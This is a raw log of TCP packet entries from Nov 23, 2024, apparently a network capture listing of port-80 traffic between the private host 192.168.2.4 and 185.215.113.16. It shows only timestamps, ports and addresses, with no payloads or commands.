                                                                                                                                                                                                Nov 23, 2024 16:53:29.740763903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.740822077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.740876913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.741874933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.742000103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.742043972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.742969990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.743091106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.743138075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.744265079 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.744294882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.744338036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.745273113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.745429039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.745476007 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.746402979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.746567965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.746614933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.747564077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.747647047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.747699022 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.748725891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.748850107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.748898983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.749087095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.749831915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.750034094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.750080109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.750972986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.751233101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.751276970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.752113104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.752271891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.752319098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.753246069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.758183002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909154892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909197092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909269094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909532070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909771919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909818888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.909884930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.910927057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.910948038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.910976887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.911870003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.911917925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.911982059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.912945986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.913003922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.913048983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.913994074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.914045095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.914124012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.915071964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.915122032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.915326118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.916155100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.916212082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.916255951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.917170048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.917222977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.917268038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.918239117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.918289900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.918334961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.919382095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.919399023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.919428110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.920327902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.920376062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.920420885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.921391964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.921441078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.921497107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.922454119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.922503948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.922547102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.923522949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.923572063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.923640013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.924653053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.924704075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.924747944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.925622940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.925671101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.925760984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.926702976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.926748037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.926791906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.927726984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.927767992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.927819967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.928790092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.928834915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.928932905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.929903030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.929948092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.929976940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.930900097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.930948019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.931027889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.931967974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.932017088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.932049990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.932997942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.933047056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.933173895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.934073925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.934118032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.934163094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.935116053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.935159922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.935189009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.936186075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.936239958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.936279058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.937217951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.937263012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.937325954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.938302040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.938349009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.938391924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.939343929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.939389944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.939460039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.940444946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.940486908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.940500021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.941463947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.941503048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.941606998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.942563057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.942625999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.942702055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.943633080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.943675041 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.943718910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.944633007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.944681883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.944710970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.945671082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.945724010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.945760012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.946753979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.946805000 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.946849108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.947796106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.947837114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.947904110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.948895931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.948937893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.949035883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.949942112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.949982882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.950026989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.951185942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.951227903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.951256037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.952039957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.952064991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.952089071 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.952202082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.953064919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.953113079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.953197002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.954164028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.954209089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.954268932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.955187082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.955226898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.955295086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.956243992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.956291914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.956336021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.957300901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.957345009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.957417011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.958354950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.958398104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.958494902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.959407091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.959453106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.959578037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.960503101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.960560083 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.960589886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.961513042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.961555004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.961616039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.962583065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.962636948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.962671995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.963679075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.963721037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.963764906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.973664045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.119806051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.119852066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.119919062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.120033979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.120249987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.120306015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.121138096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.121293068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.121344090 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.121992111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.122119904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.122179031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.123089075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.123174906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.123220921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.124079943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.124195099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.124236107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.125123024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.125205040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.125252962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.126249075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.126301050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.126389980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.127262115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.127379894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.127424955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.128365040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.128451109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.128504038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.129348993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.129473925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.129527092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.130429029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.130548000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.130598068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.131485939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.131587982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.131637096 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.132522106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.132641077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.132692099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.134233952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.134289980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.134337902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135097027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135200024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135282040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135848045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135878086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.135926962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.136756897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.136850119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.136902094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.137799025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.137909889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.137955904 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.138863087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.138942003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.138988018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.139955044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.140033007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.140083075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.140983105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.141084909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.141130924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.142034054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.142159939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.142206907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.143127918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.143280029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.143341064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.144160032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.144274950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.144320965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.145207882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.145338058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.145391941 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.146286011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.146380901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.146425962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.147327900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.147353888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.147413969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.148459911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.148582935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.148636103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.149475098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.149501085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.149550915 CET4974480192.168.2.4185.215.113.16
